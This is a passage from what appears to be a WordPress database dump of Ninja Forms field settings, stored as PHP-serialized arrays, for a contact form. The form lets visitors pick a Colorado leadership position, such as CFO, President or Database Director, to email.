Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8460,112,'field_key','phone_121','field_key','phone_121'),(8461,112,'value','','value',''),(8462,113,'field_label','Your Local Area','field_label','Your Local Area'),(8463,113,'field_key','listselect_122','field_key','listselect_122'),(12110,378,'value','','value',''),(12098,377,'key','textbox_21','key','textbox_21'),(12099,377,'default','','default',''),(3222,101,'key','listselect_11','key','listselect_11'),(3223,101,'container_class','','container_class',''),(3224,101,'parent_id','10','parent_id','10'),(3225,102,'objectType','Field','objectType','Field'),(3226,102,'objectDomain','fields','objectDomain','fields'),(3227,102,'editActive','','editActive',''),(3228,102,'order','7','order','7'),(3229,102,'type','hr','type','hr'),(3230,102,'label','hr','label','hr'),(3231,102,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3232,102,'show_desc','0','show_desc','0'),(3233,102,'desc_pos','none','desc_pos','none'),(3234,102,'desc_text','','desc_text',''),(3235,102,'element_class','','element_class',''),(3236,102,'key','hr_13','key','hr_13'),(3237,102,'container_class','','container_class',''),(3238,102,'parent_id','10','parent_id','10'),(3239,103,'objectType','Field','objectType','Field'),(3240,103,'objectDomain','fields','objectDomain','fields'),(3241,103,'editActive','','editActive',''),(3242,103,'order','8','order','8'),(3243,103,'type','html','type','html'),(3244,103,'label','Colorado Leadership Positions','label','Colorado Leadership Positions'),(3245,103,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3246,103,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>'),(3247,103,'desc_el','div','desc_el','div'),(3248,103,'show_desc','0','show_desc','0'),(3249,103,'desc_pos','none','desc_pos','none'),(3250,103,'desc_text','','desc_text',''),(3251,103,'element_class','','element_class',''),(3252,103,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>'),(3253,103,'key','html_14','key','html_14'),(3254,103,'container_class','','container_class',''),(3255,103,'parent_id','10','parent_id','10'),(3256,104,'objectType','Field','objectType','Field'),(3257,104,'objectDomain','fields','objectDomain','fields'),(3258,104,'editActive','','editActive',''),(3259,104,'order','9','order','9'),(3260,104,'type','listselect','type','listselect'),(3261,104,'label','Select the person you would like to email','label','Select the person you would like to email'),(3262,104,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3263,104,'label_pos','above','label_pos','above'),(3264,104,'list_type','dropdown','list_type','dropdown'),(3265,104,'multi_size','5','multi_size','5'),(3266,104,'list_show_value','1','list_show_value','1'),(3267,104,'list','a:0:{}','list','a:0:{}'),(3268,104,'user_info_field_group','','user_info_field_group',''),(3269,104,'calc_auto_include','0','calc_auto_include','0'),(3270,104,'user_state','0','user_state','0'),(3271,104,'num_sort','0','num_sort','0'),(3272,104,'admin_label','','admin_label',''),(3273,104,'show_help','0','show_help','0'),(3274,104,'help_text','','help_text',''),(3275,104,'show_desc','0','show_desc','0'),(3276,104,'desc_pos','none','desc_pos','none'),(3277,104,'desc_text','','desc_text',''),(3278,104,'element_class','','element_class',''),(3279,104,'required','1','required','1'),(3280,104,'options','a:11:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:0;}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:32:\"Administrative Services Director\";s:5:\"value\";s:32:\"Administrative Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:1;}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"CFO\";s:5:\"value\";s:3:\"CFO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:2;}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:17:\"Class Coordinator\";s:5:\"value\";s:17:\"Class Coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:3;}i:4;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"Communication Coordinator\";s:5:\"value\";s:25:\"Communication Coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:4;}i:5;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:17:\"Database Director\";s:5:\"value\";s:17:\"Database Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:5;}i:6;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:26:\"Family & Youth Coordinator\";s:5:\"value\";s:28:\"family-and-youth-coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:6;}i:7;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"President\";s:5:\"value\";s:9:\"President\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:7;}i:8;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"RESA\";s:5:\"value\";s:4:\"RESA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:8;}i:9;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:9;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:27:\"Spiritual Services Director\";s:5:\"value\";s:27:\"Spiritual Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:10;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:15:\"Vahana Director\";s:5:\"value\";s:15:\"Vahana Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:10;}}','options','a:11:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:0;}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:32:\"Administrative Services Director\";s:5:\"value\";s:32:\"Administrative Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 